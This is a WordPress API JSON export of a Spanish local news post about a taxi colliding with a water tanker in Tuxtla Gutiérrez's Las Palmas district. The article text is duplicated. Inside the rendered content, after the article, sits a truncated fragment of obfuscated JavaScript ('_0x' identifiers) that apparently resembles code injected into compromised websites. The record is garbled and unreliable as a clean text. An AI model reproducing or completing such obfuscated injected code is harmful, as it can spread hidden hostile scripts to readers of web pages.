{"id":10928,"date":"2023-07-11T02:36:27","date_gmt":"2023-07-11T02:36:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10928"},"modified":"2023-07-11T02:36:27","modified_gmt":"2023-07-11T02:36:27","slug":"taxi-colisiona-contra-pipa-en-las-palmas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10928","title":{"rendered":"Taxi colisiona contra pipa en Las Palmas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689042907232-1024x768.jpg\" alt=\"\" class=\"wp-image-10929\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689042907232-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689042907232-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689042907232-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689042907232.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 10 de julio del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana se registr\u00f3 un fuerte accidente de tr\u00e1nsito en la Colonia Las Palmas, cuando una unidad de transporte p\u00fablico en la modalidad de taxi se impact\u00f3 contra una pipa.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, fue cerca de las 11 de la ma\u00f1ana cuando la pipa con capacidad de 10 mil litros circulaba en el carril Norte a Sur sobre el Bulevar Las Palmas y esquina de la Avenida Palma Real cuando al girar a la izquierda se top\u00f3 de frente con el taxi chocando de lleno.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el taxista ocasion\u00f3 la colisi\u00f3n al meterse en sentido contrario para cortar camino.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y tomaron datos de lo sucedido.<\/p>\n\n\n\n<p>Los involucrados llegaron a un acuerdo armonioso para evitar problemas legales.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 10 de julio del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana se registr\u00f3 un fuerte accidente de tr\u00e1nsito en la Colonia Las Palmas, cuando una unidad de transporte p\u00fablico en la modalidad de taxi se impact\u00f3 contra una pipa.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, fue cerca de las 11 de la ma\u00f1ana cuando la pipa con capacidad de 10 mil litros circulaba en el carril Norte a Sur sobre el Bulevar Las Palmas y esquina de la Avenida Palma Real cuando al girar a la izquierda se top\u00f3 de frente con el taxi chocando de lleno.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el taxista ocasion\u00f3 la colisi\u00f3n al meterse en sentido contrario para cortar camino.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y tomaron datos de lo sucedido.<\/p>\n\n\n\n<p>Los involucrados llegaron a un acuerdo armonioso para evitar problemas legales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 10 de julio del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana se registr\u00f3 un fuerte accidente de tr\u00e1nsito en la Colonia Las Palmas, cuando una unidad de transporte p\u00fablico en la modalidad de taxi se impact\u00f3 contra una pipa. Los reportes oficiales informaron que, fue cerca de las 11 de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10929,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10928","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10928","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10928"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10928\/revisions"}],"predecessor-version":[{"id":10930,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10928\/revisions\/10930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10929"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}